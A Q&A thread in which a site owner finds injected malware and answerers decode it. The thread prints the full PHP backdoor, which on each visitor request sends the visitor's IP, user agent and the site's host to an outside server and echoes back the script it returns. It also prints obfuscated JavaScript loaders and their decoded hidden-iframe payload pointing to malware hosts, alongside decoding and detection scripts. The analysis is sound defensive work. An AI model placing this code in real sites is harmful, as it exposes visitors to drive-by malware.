I'm developing an e-commerce website. It was working fine, but suddenly none of the ajax functionality works any more. When I inspect the ajax response in firebug, I can see some js string appended to the response:

```text
{"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
\/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
{try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
```

I only get this error in firefox....

This is what they added to the index.php file:
```php
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
```
I just removed the code and it works fine......

Answer 0 (score: 17)

Too bad you didn't give us the complete javascript that the php injected (please add it to your question if you still have it, so we can decode it). But thanks a lot for sharing the PHP behind it!

Removing the php script is indeed the solution, but you should find out how you got 'hacked'/'infected' in the first place!!

Note that this kind of malware is often picked up by google: they add a warning to the index entry of such a hacked site: 'This site may harm your computer.'

Getting rid of that notion requires a 'Request a malware-review' using google webmaster tools (I don't know whether google automatically rescans your page after x amount of time if you don't report your page as fixed, and I also don't know whether you can report your page as fixed without google webmaster tools, so if you don't want to give google your mobile number, beware!!!).

The base64 decoded string `aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw` in your php code gives the url: http://mbrowserstats.com/statE/stat.php

Your infected php website uses the url above with the GET-string `?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])` to fetch custom, unique, on-demand javascript to insert into the markup served to the (targeted!!) visitor.

To decode the inserted visitor-unique javascript payload, I quickly whipped up a decoder (which also works for your partial payload, using the character `_` as separator and offset -7 on base 16 numbers).

The (partial) string:

```text
10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
```

decodes to:

```javascript
if (document.getElementsByTagName('body')[0]){
```

I'd like to share my analysis of the variant I got, explaining how it works (hopefully it helps someone):

A website I visited (in palemoon = firefox) suddenly started java and popped up a cmd-box. Cr@p.

'View source' of that file disclosed an obfuscated script that was served (inserted) before the `<html>` tag (with leading whitespace):
```html
<script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20
,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...
```
Running it through jsbeautifier.org cleaned it up (before I added my manually parsed comments):
```javascript
w = window; //hmmkay, note:reused lateron
aq = "0" + "x"; //so.. '0x', smells like hex
ff = String; //haha, neat, ff is String
ff = ff.fromCharCode; //and ff is now String's fromCharCode method
try {
    document["\x62ody"] ^= ~1; //I'm guessing this should fail
} catch (d21vd12v) { //so all the rest gets executed:
    v = 123; //bliep? 42? Here be dragons.. aka useless
    vzs = false; //ahh, can you guess where this leads?
    try { //no idea why this test is here
        document;
    } catch (q) { //but for an infection this should NOT run
        vzs = 1;
    }
    if (!vzs) e = w["eval"]; //false will become true so e = EVIL
    if (1) { //lol, if true, ok...
        //ahh, f the payload, an array (by split) of
        //640 hex-numbers
        f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
    }
    w = f; //ahh juggling w to f
    s = []; //preparing s to receive the decoded string
    for (i = 2 - 2; - i + 640 != 0; i += 1) { //haha, ok: ( 2-2=0; lol; i++ )
        j = i; //juggle artist at it again
        if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9); //9 offset
    } // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
    fafa = e; //ok stop juggling. fafa = EVIL
    fafa(s) //there we go: EVIL(decoded string)
}
```
As one can now read, they jump through a lot of hoops to fool virus scanners.

I refactored this (my understanding of it) to:
```javascript
w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
    s += String.fromCharCode( parseInt(w[i],16) + 9 ); //decode
}
eval(s) //execute
```
Using my decoder (set to base `16`, separator character `,` and offset `9`) the payload decoded to:
```javascript
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
```
Note that this resulting code was indented with 2 and 3 tabs (amateur, or fooling the virusscan?), which I removed for readability. The line endings were also CR (13 dec) (author/script-kiddie using an older MAC?).

So, now we have all the code to (finally) simply explain what happens:

The `curl` is a visitor/site-unique javascript injection service that marks up an `iframe` injected into a `body` (which the browser helpfully creates, since the body doesn't exist yet), positioned `-10000px` to the left (out of sight) of the visitor's page (visitor's browser), and the `iframe` loads a specifically targeted (on the visiting user and the site visited) external page (containing god knows what kind of mess/malware/virus/rootkit; in my case from `rotatethespin.com:8000`, `muruno-vaser.info:8000`, `epomota.com` etc.). I also verified this by fetching the document's live HTML using this bookmarklet:

```javascript
javascript:(function(){ alert(document.documentElement.innerHTML); })()
```

This also showed the injected iframe code in the source.

I used the next bookmarklet to move the iframe into view (assuming there is only 1 iframe):

```javascript
javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()
```

Of course one can also use firebug and similar tools (depending on the browser).

I also noticed that when using most web-based tools (even the w3c validator) to fetch the source of an infected website, the php didn't insert the javascript, making the site look uninfected!

I also had this 'problem' when trying a simple telnet command to (safely) fetch the infected code. However, after seeing the PHP code behind it, I realised I had been sending too few HTTP headers (especially the referer).

Executing: `telnet infected-site.com 80`

and then pasting the following finally gave the infected markup source:

```http
GET /path.php?page=something HTTP/1.1
Host: infected-site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Referer: http://infected-site.com/index.php
Connection: Close
```

Note that this way one can also safely explore (and reverse-engineer) the source of the iframe etc.!!

I also noticed that the website owner's computer did not get the infected code! This might be because his machine was infected, or because the server distributing the javascripts didn't serve the script, since it knew the client machine was already infected.

UPDATE: with the set of tools in this answer I re-checked the website in question today (after a good night's sleep), and it injected a totally different script (but still based on the same technique I explained in this answer):

```html
<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155
,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
```

Note that this time the numbers are octal (base 8) (separated by `,`, with the offset used in the script).
So I updated my decoder to include a base/radix setting (as well as all the dependent links in this answer), and I can see the payload stays the same (apart from the domain it points to).
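The three payloads on this page (the question's `_`-separated hex with offset -7, the answer's hex with offset +9, and the octal variant with offset -4) are all the same `fromCharCode(parseInt(token, base) + offset)` scheme. The following is an added example, not the answerer's decoder: it implements that scheme with the base, separator and offset as parameters, and brute-forces those three parameters for a payload whose settings are unknown by keeping the fully printable decoding that contains the most JavaScript keywords. The partial payload is the one quoted in the question; the two short excerpts are the opening tokens of the answer's payloads, embedded here as constructed samples.

```python
import string

# Payloads quoted on the page: the question's partial payload (base 16, '_'-separated,
# offset -7) and the opening tokens of the two payloads in the answer (constructed excerpts).
PARTIAL_PAYLOAD = ("10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b"
                   "_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10")
HEX_EXCERPT = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b"                # base 16, ',', offset +9
OCT_EXCERPT = "15,15,155,152,44,54,150,163,147,171,161,151,162,170"   # base 8, ',', offset -4

PRINTABLE = set(string.printable)        # ASCII 0x20-0x7e plus \t \n \r \x0b \x0c
JS_MARKERS = ("document", "function", "iframe", "eval", "body", "script")


def decode_payload(payload, base, sep, offset):
    """Reverse the loader's String.fromCharCode(parseInt(token, base) + offset) loop."""
    return "".join(chr(int(tok, base) + offset)
                   for tok in payload.split(sep) if tok.strip())


def guess_params(payload, bases=(8, 10, 16), seps=(",", "_", "|", ";"),
                 offsets=range(-16, 17)):
    """Try every base/separator/offset; keep the fully printable decoding with the most
    JavaScript markers. Returns (base, sep, offset, text) or None if nothing fits."""
    best = None
    for sep in (s for s in seps if s in payload):
        for base in bases:
            for off in offsets:
                try:
                    text = decode_payload(payload, base, sep, off)
                except ValueError:       # token not valid in this base, or negative code point
                    continue
                if any(ch not in PRINTABLE for ch in text):
                    continue             # real JS never decodes to control/non-ASCII bytes
                score = sum(marker in text for marker in JS_MARKERS)
                if score and (best is None or score > best[0]):
                    best = (score, base, sep, off, text)
    return None if best is None else best[1:]


if __name__ == "__main__":
    print(decode_payload(PARTIAL_PAYLOAD, 16, "_", -7).strip())
    for sample in (HEX_EXCERPT, OCT_EXCERPT):
        print(guess_params(sample))
```

The leading tabs and the trailing CR that the answer mentions survive in the decoded text, which is why the first print strips them.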
I found this question by googling `document["\x62ody"] ^= ~1`, which gave 834 (mostly useless/infected) results.

The malware I stumbled upon today has the string above plus the quite unique string 'd21vd12v', which gives 8300 (also mostly useless/infected) results.

However, googling '// This code use for global bot statistic' (found in the php given in your question) gives over 4.1 million results (going back to at least 2010), indicating that wordpress, joomla etc. are also victims of this 'technique'.

Reading some of those links (like this, this or this), I get the impression it is about fooling search engines (like google) in order to increase page rank, at the cost of a self-inflicted malware vulnerability. Naturally, the variants dedicated to distributing malware now try to hide themselves from the search engines.
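Since the answer shows the injected PHP is recognisable by a few fixed strings (the marker comment it googled, the `$sRetry` guard, the user-agent cloaking test and the `curl_init(` fetch) plus a `base64_decode('...')` literal that hides the callback URL, a quick triage check over PHP files is the natural follow-up. The following is an added example (not from the page's author): it decodes every base64 literal passed to `base64_decode`, reports the ones that hide a URL, and counts the markers. The sample file is a constructed excerpt modelled on the question's injected block; the clean sample is also constructed.

```python
import base64
import re

# Constructed excerpt modelled on the injected block in the question (not a real file).
SAMPLE_PHP = r"""<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'bot') == false))
{
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
?>"""
CLEAN_PHP = "<?php echo json_encode(['ok' => true]); ?>"   # constructed benign file

B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# Strings from the page that identify this family.
MARKERS = ("This code use for global bot statistic", "$sRetry",
           "strstr($sUserAgent", "curl_init(")


def hidden_urls(src):
    """Decode every base64_decode('...') literal and return those that hide a URL."""
    urls = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # not valid base64 / not text
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def scan_php(src):
    """Report markers and hidden URLs; any hidden URL or two or more markers is a hit."""
    found = [m for m in MARKERS if m in src]
    urls = hidden_urls(src)
    return {"markers": found, "urls": urls, "infected": bool(urls) or len(found) >= 2}


if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP))
    print(scan_php(CLEAN_PHP))
```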
Answer 1 (score: 1)

This looks like 'injected' code that results in another URL serving up a blackhole exploit kit.